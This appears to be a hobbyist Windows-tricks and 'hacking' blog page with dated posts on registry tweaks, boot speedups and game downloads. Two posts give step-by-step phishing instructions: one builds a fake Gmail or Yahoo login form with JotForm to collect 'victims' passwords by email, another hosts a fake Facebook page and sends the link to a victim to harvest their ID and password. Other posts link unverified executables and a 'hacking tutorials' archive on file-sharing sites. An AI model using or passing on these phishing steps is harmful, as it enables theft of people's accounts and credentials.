But next time, if you want to enable “Turn Off Computer” button on start menu then simply change the value of data box to 0 or delete NoClose DWORD item.

Saturday

Create your own fake Page.

Now let’s learn how to create your very own fake login page.
{1} Open www.jotform.com and Sign Up.
{2} then Login there with your newly registered account.
{3} now click on ‘ Create your first form’.
{4} Now delete all the pre-defined entries, just leave ‘First Name:’ (To delete entries, select the particular entry and then click on the cross sign.)
{5} Now Click on ‘First Name:’ (Exactly on First Name). Now the option to Edit the First Name is activated, type there “username:” (for Gmail) or YahooId: (for Yahoo)
{6} Now Click on ‘Power Tool’ Option (In right hand side…)
{7} Double click on ‘Password Box’. Now Click the newly form password entry to edit it. Rename it as ‘Password:’
{8} Now Click on ‘Properties’ Option (In right hand side…). These are the form properties.
{9} You can give any title to your form. This title is used to distinguish your forms. This Title cannot be seen by the victim.
{10} Now in Thank You URL you must put some link, like http://www.google.com or anything. Actually after entering username & password, user will get redirect to this url.(Don’t leave it blank…)
{11} Now Click on ‘Save’. After saving, click on ‘Source’ Option.
{12} Now you can see two Options, namely ‘Option1′ & ‘Option2′. Copy the full code of ‘Option2′.
{13} Now open Notepad text editor and write the following code their.
Paste the Option2 code here
{14} And now save this as index.html. And then host it, mean you will have to put it on the internet so that everyone can view it. Now i think that you would be knowing it and if in case you do not know it please leave a comment with your email-id and i will mail you how to do it.
Now you can view it by typing the url in the address bar.
NOTE: If u want to send it to the internet, then first you will have to create a hosting account which you can create on www.110mb.com and there are many other sites which you can find on the internet very easily.
I suppose that you created your account at 110mb.com
now login to your account then click on “File Manager”, then click on “upload files” or just “upload”. Then select the file which you want to send to the internet and click on upload. And you are done.
Now you can access you file on the net by just typing the url ofthe file.
And you will receive password of the users that login to your site through email-id which you’ve entered while creating the form.

Who is Hacker?

A hacker is someone who thinks differently than the rest. A hacker is a problem solver who creates a solution no one else has thought of before. Nothing is impossible to a hacker. There is always a solution, other people just haven’t thought of it yet.
Hackers don’t play by the rules. The rules exist to tell us what we can and can’t do, but nothing is impossible for a hacker. I guess no one ever told the Wright brothers it was impossible to fly. I guess no one ever told Thomas Edison it was impossible to create a light bulb. These people were all hackers in their own way, solving problems by thinking differently.
I’m going to be redefining hacking. Lets forget about Hacker vs. Cracker. Most websites you will find believe that Hackers are programmers and Crackers break through security systems. Those who have copied that definition are obviously couldn’t think for themselves. As I said before being a hacker is a state of mind, how you use that intelligence another story. There are good and bad hackers just like there are good and bad doctors.
So where did the term hacker come from? The term hacker was originally given to furniture makers, back then they didn’t have nails. So they used an Axe to hack the wood together in a way that created furniture.

Friday

Watch a movie in paint

1 Start a movie in any player.

2 Then open Paint.

3 Now, in the player when the movie is being played, press "Print screen" button on your key board.

4 Now, Press Paste(ctrl+v) in Paint.

5 Leave the movie player open and don't minimize it.

6 Open Paint now and see the movie in the Paint..

Enjoy and Leave a comment...

Thursday

Transform XP To Mac OS X Leopard free download

EVERYONE WANTS THAT THEIR OS SHOULD BE LOOK LIKE MAKE OS.

I HAVE FOUND ONE TRANSFORMATION PACK FOR WINDOWS XP

THAT CONVERTS THE WINDOWS XP INTO MAC LEOPARD OS.

AFTER INSTALLING THIS PACK YOUR WINDOWS XP IS LOOK LIKE AS GIVEN IN THE SNAPSHOT.

(1)

(2)


DOWNLOAD LINK

HTTP://WWW.ZIDDU.COM/DOWNLOAD/15325708/LEOPARDXP.EXE.HTML

ANGRY BIRDS game for windows free download.

Free download angry birds for windows
Apple's popular game



enjoy and play the angry birds.


download link

http://www.ziddu.com/download/15327122/AngryBirds.rar.html

leave a comment.
thnx for the visit.

Wednesday

How to Boot Window Xp Fast ?

Follow the following steps

1. Open notepad.exe, type "del c:\windows\prefetch\ntosboot-*.* /q" (without the quotes) & save as "ntosboot.bat" in c:\
2. From the Start menu, select "Run..." & type "gpedit.msc".
3. Double click "Windows Settings" under "Computer Configuration" and double click again on "Shutdown" in the right window.
4. In the new window, click "add", "Browse", locate your "ntosboot.bat" file & click "Open".
5. Click "OK", "Apply" & "OK" once again to exit.
6. From the Start menu, select "Run..." & type "devmgmt.msc".
7. Double click on "IDE ATA/ATAPI controllers"
8. Right click on "Primary IDE Channel" and select "Properties".
9. Select the "Advanced Settings" tab then on the device or 1 that doesn't have 'device type' greyed out select 'none' instead of 'autodetect' & click "OK".
10. Right click on "Secondary IDE channel", select "Properties" and repeat step 9.
11. Reboot your computer.

Free download 1000 hacking tutorials

Now free download 1000 hacking tutorials which includes all the stuffs of hacking , cracking and tips
its most useful.



its includes the most of hacking tricks and tips , e books of hacking , Phreaking and many more tutorials are available to download.

And security , remote shutdown , cmd tricks , windows tricks . networks tricks , dos tricks and many more things are available to download.


lots of other tutorials are available.

download link
http://www.ziddu.com/download/15369152/1000HackerTutorials.rar.html

Tuesday

How to enable right click on sites/blog ?

Lots of web sites have disabled the right click function of the mouse button...
it disables ALL right-click functionality: copy, paste, open in new window.


It's easy to change, assuming your using IE:




Click "Tools"->"Internet Options"
Click the "Security" tab
Click "Custom Level"
Scroll down to the "Scripting" section
Set "Active Scripting" to "disable"
Click "Ok" a couple of times.

You'll probably want to turn this back to "enable" when your done... 'cause generally the javascript enhances a website.

Facebook hack to display your message


Now using this hack you can display a custom message on facebook and prank your friends that you have hacked this facebook page.
You can change the message and title whatever you want.



How to display your custom message and title on facebook:

1) open your browser
2) copy the bellow URL and paste in the address bar of web brower

https://www.facebook.com/connect/connect_to_node_error.php?title=MY TITLE&body=MY MESSAGE
3) Now change 'MY TITLE' with your title you want to display and 'MY MESSAGE' with your message and press enter



NOWlet my title is cyber security and message is hacked by cyber security then the URL will become something like this:
https://www.facebook.com/connect/connect_to_node_error.php?title=cyber security&body=hacked by cyber security
see this

Monday

How to enable registry disabled by administrator


Open the Notepad

and copy the bellow code and paste into the notepad.

Windows Registry Editor Version 5.00
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System]
"DisableRegistryTools"=dword:00000000

now save it as "anything.reg" and dont forget to to select file type as all files while saving otherwise you will not been able to execute it
now close the file and double click on file then press ok
then you can access the registry.

How to hack facebook account

Hey friends now i am posting a post about hacking the facebook account in easy way.

There are many ways to hack the facebook account like keylogger , facebook freezer tool and facebook hacker tools are used for facebook hacking account. But the above all are very difficult now the easiest way to hack facebook account is as follow.


The easiest way to hack facebook account is phishing .

You need one facebook fake page if you haven't facebook page click here to download
Now go to www.my3gb.com and make your id by sign up.
after making the id login into the my3gb and go to my3gb's file manager and upload the facebook fake page.
now right click on the facebook fake page(where you have uploaded it) and copy that link.
and send to your victim.
when your victim logins using the link which you have sent then into the my3gb's file manager one file will created named facebook password which includes the facebook ID and PASSWORD of your victim.
Related Posts Plugin for WordPress, Blogger...